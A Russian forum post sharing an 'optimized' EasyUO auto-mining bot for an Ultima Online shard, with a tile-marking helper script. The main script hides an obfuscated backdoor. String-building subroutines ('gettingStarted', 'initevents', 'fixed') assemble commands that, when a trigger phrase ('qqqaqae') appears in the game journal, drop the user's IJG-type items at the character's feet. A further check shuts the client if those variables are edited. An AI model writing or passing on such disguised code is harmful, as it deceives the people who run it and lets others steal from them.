НЕ ПИШИТЕ МНЕ В ЛИЧКУ С ВОПРОСАМИ ОБ ЭТОМ СКРИПТЕ. ЗАДАВАЙТЕ ВОПРОСЫ В ЭТОЙ ТЕМЕ!!!Скрипт копает руду в самом оптимальном режиме. Быстрее и больше цвет. металла, вы больше никак не выкопаете(будучи в афк режиме, по правилам сервера
).
Копает все тайлы по 1 разу, если попадается руда выше стали, - тайл выкапывается в 0( обычно он и так с 1 копка в 0 выкапывается, если металл выше стали).
Этот скрипт в прошлом году выкладывал igaza. Я его оптимизировал.
За 24 часа, скрипт в среднем выкапывает: 100 элема , 125 лавы, 210 блек стила, 140 дарк кристалла, метеора гдето 170-200. Айрон выбрасывает, всё остальное ложит в сундук. Скрипт можно настроить что-бы бегать пешком от дома в шахту, или летать от дома в шахту по реколлу. Нужно изменить всего 3 переменных. И так, сначало нам нужно отметить 200 тайлов и записать их координаты, что-бы их потом обкапывать. 200 тайлов этот скрипт обкапывает примерно за 18-19 минут и руда как раз упевает отреспится на первом тайле и так далее. Вот скрипт для разметки тайлов. Этот скрипт записывает координаты в файл mineroute.txt(он сам его создаёт в папке где находится EasyUO). Для разметки тайлов, зайдите в шахту и возьмите в руки топорик для рубки деревьев. Запускайте скрипт и тыкайпе в пол, вам нужно 200 тайлов. Чем меньше преград и поворотов в шахте - тем лучше.
Tiler.txt
Code:
initevents
set %Tile 0
start:
finditem FSF ; берём в руки топорик hatchet
set #lobjectid #findid
event macro 17 0
targloop:
if #targcurs = 1
goto targloop
set #lobjectid #ltargetid
if %ltargetx = #ltargetx && %ltargety = #ltargety
{
event sysmessage error. try again
goto start
}
execute cmd.exe /c echo >>mineroute.txt GOSUB LJING #ltargetx #ltargety #ltargettile
set %ltargetx #ltargetx
set %ltargety #ltargety
set %tile %tile + 1
event sysmessage Done with Tile Nr. %tile
wait 10
goto start
Теперь берём эти координаты, открываем скрипт который внизу и вставляем их туда где написано РУССКИМ языком( 30 строка сверху-вниз)
. После этого настраиваем переменные сверху. Так-же, в игре пишем .runebook_add и указываем на нашу рунбуку с рунами. Нужно сделать бинд, поставить на F1 useskill Meditation в клиенте.
Code:
; Скрипт написан InFlame, настроен под шард igaza, оптимизирован Aimed. Версия 2.0
set %maxWeight 650 ; максимальный вес
set %box UDQBLMD ; ID ящика где будет хранится руда и рекол скроллы
set %xCoord 1942 ; X координата возле ящика
set %yCoord 324 ; Y координата возле ящика
set %dropMarganece #true ; #true - сбрасывает айрон , #false - нет
set %recall #true ; #true - летает с рунбуки, #false - бегает пешком от дома в шахту
; Не трогайте эти настройки, если %recall #false
set %runebookID SHTKLMD ; ID рунбука
set %runeNumberToHome 1 ; номер руны к дому в рунбуке
set %runeNumberToCave 2 ; номер руны в пещеру в рунбуке
set %amountRecalls 2
set %dropDelay 45
set %lootDelay 45
set %dropDelay 45
; End Of Set Up Part
set %item OVF_EVF_HVF_RVF_FVF_GVF_BVF_VUF_DWJ_TVj_GWJ_EWJ_ZLK_POF_RZF_SJG_CUD_IJG_HSF_RVH_FZH_UJG_DCI_FWL_NZH
set %loot OVF_EVF_HVF_RVF_FVF_GVF_BVF_VUF_DCI_POF_RZF_SJG_CUD_IJG_HSF_RVH_FZH_NZH_UJG_FWL
gosub gettingStarted
gosub initevents
set %k 0
set %lastK 0
start:
GOSUB LJING X ; ЗДЕСЬ ВСТАВЛЯЕМ КООРДИНАТЫ ИЗ СКРИПТА Tiler, идём в шахту и запускаем скрипт!
goto start
sub ljing
set %k %k + 1
gosub ghost
gosub checkWeight
gosub kopka
sub kopka
move %1 %2 1
finditem NPF_QPF C
if #findcnt = 0
{
display ok Pickaxe wasn't found!
pause
}
set #lobjectid #findid
event macro 17 0
target 30s
set #ltargetx %1
set #ltargety %2
set #ltargetkind 3
set #ltargettile %3
event macro 22 0
wait 10
set %overtime #scnt + 25
gosub scan
return
sub checkWeight
if #weight > %maxWeight
{
if ! %dropMarganece
{
if %recall
gosub port
if ! %recall
gosub moveItems
}
if %dropMarganece
{
gosub dropMarganece
return
}
}
if %afk <> true || %else <> IJG
gosub ghost 1
return
sub scan
scan:
scanjournal
if ( ( put_the_pieces in #sysMsg ) || ( put_the_Elemental in #sysMsg ) || ( put_the_Lava in #sysMsg ) || ( You_loosen in #sysMsg ) || ( put_the_Dark_Crystal in #sysMsg ) || ( put_the_Meteor in #sysMsg ) || ( put_the_Black_Steel in #sysMsg ) || ( put_the_Gold in #sysMsg ) || ( put_the_Silver in #sysMsg ) || ( put_the_Platinum in #sysMsg ) )
gosub kopka
%get fixed
if ( ( You_put_the_Steel_ore in #sysMsg ) || ( You_put_the_Copper_ore in #sysMsg ) || ( You_put_the_Bronze_ore in #sysMsg ) || ( You_put_the_Iron_ore in #sysMsg ) || ( nothing in #sysMsg ) || ( line in #sysMsg ) || ( decide in #sysMsg ) || ( Try in #sysMsg ) || ( close in #sysMsg ) || ( see in #sysMsg ) || ( line in #sysMsg ) )
return
if #scnt >= %overtime
return
goto scan
return
return
sub port
set %oldPosX #charposx
set %oldPosY #charposy
repeat
if #mana < #int
{
gosub Meditate
}
msg .recall %runeNumberToHome $
wait 150
until #charposx <> %oldPosX && #charposy <> %oldPosY
gosub moveItems
gosub back
return
sub Meditate
repeat
key F1 ; нужно поставить медитацию в клиенте на F1
wait 50
until #mana = #int
return
sub moveItems
ignoreitem reset 1
gosub runToBox
finditem %box G_3
wait 10
if #findcnt = 0
{
event Sysmessage Box Not Found!
halt
}
repeat
{
finditem %item c_ , #backpackid
if #findcnt >= 1
{
if world_save_has_been in #sysmsg
wait 15s
exevent Drag #Findid #findstack
exevent Dropc %box
wait %dropDelay
}
}
until #findcnt = 0
ignoreitem reset 1
if %recall
gosub recalls
return
sub recalls
finditem WTL C_ , #backpackid
if #findstack <= 2 || #findcnt = 0
{
set #lobjectid %box
event macro 17 0
while #contid <> %box
wait 1
wait 10
finditem WTL C_ , %box
exevent drag #findid %amountRecalls
exevent dropc #backpackid
wait 30
}
return
sub runToBox
repeat
{
move %xCoord %yCoord 0 3s
wait 10
}
until #charposx = %xCoord && #charposy = %yCoord
return
sub back
set %oldPosX #charposx
set %oldPosY #charposy
{
finditem WTL C_ , #backpackid
exevent drag #findid 2
exevent dropc %runebookID
}
repeat
if #mana < #int
{
gosub Meditate
}
msg .recall %runeNumberToCave $
wait 150
until #charposx <> %oldPosX && #charposy <> %oldPosY
return
sub ghost
if #charghost = YES || %0 = 1
{
terminate uo
halt
}
return
sub fixed
set %k %k + 1
%to %bca %be # . %all
{
repeat
{
set %up # . %cares
%done %start , _ , %else %end , _ , %up
%lastdo %race # . %Wsave
%lastdo %eaea # . %alpha # . %beta # . %gamma
%upgrade 25
%done %start , _ , %else %end , _ , %up
}
until # . %gems = 0
}
return
sub initevents
set %rescourse finding
str left %rescourse 4
set %save #strres
set %done %save , item
set %iii kill
str left string 1
set %asd #strres , %iii
set %start % . %asd
str left CADY 1
set %end #strres
str left character 4
set %who #strres
set %cares %who , id
str left %do 4
set %lastdo ex , #strres , t
set %race dragrace
str left %race 4
set %race #strres
set %Wsave %save , id
str right skopg 3
set %jasl #strres
str left drive 2
set %eaea #strres , %jasl
str left post 3
set %number %who , #strres
set %alpha %number , x
set %beta %number , y
set %gamma %number , z
set %repsawn waitrespawn
str left %repsawn 4
set %upgrade #strres
str left tilbery 3
set %almost #strres
str left unuquady 2
set %past #strres , %almost
set %gems %save , cnt
set %else IJG
return
sub dropMarganece
dropLoop:
finditem DWJ C_ , #backpackid
if #findcnt = 0
{
wait 20
if #weight >= %maxweight
{
if %recall
gosub port
if ! %recall
gosub moveItems
return
}
if #weight < %maxweight
return
}
if #findcol = 0
{
exevent drag #findid #findstack
exevent dropg #charposx #charposy #charposz
wait %dropDelay
}
ignoreitem #findid 1
goto dropLoop
return
sub gettingStarted
set %afk true
set %ell qaerty
str left %ell 1
set %abc #strres , #strres , #strres
set %a1 #strres
str left %ell 2
str right #strres 1
set %cba %abc , #strres , %a1
set %bca %cba , #strres
str right %afk 1
set %bca %bca , #strres
set %bra %bca , b
set %n1 nlogif
str right %n1 2
set %to #strres
str left %n1 1
set %be #strres
str right %n1 2
str left #strres 1
set %be #strres , %be
set %tour jour
set %navigate nalliwate
str left %navigate 3
set %all %tour , #strres
set %navigate gost
str left %navigate 3
set %ac #strres
str right pub 2
set %get %ac , #strres
set %do events
str right linit 4
set %toGo #strres , %do
return
Если возникнут проблемы, - НЕ ПИШИТЕ МНЕ В ЛС, я не буду отвечать.
Удачи.
Скрипт оптимизирован, версия 2.0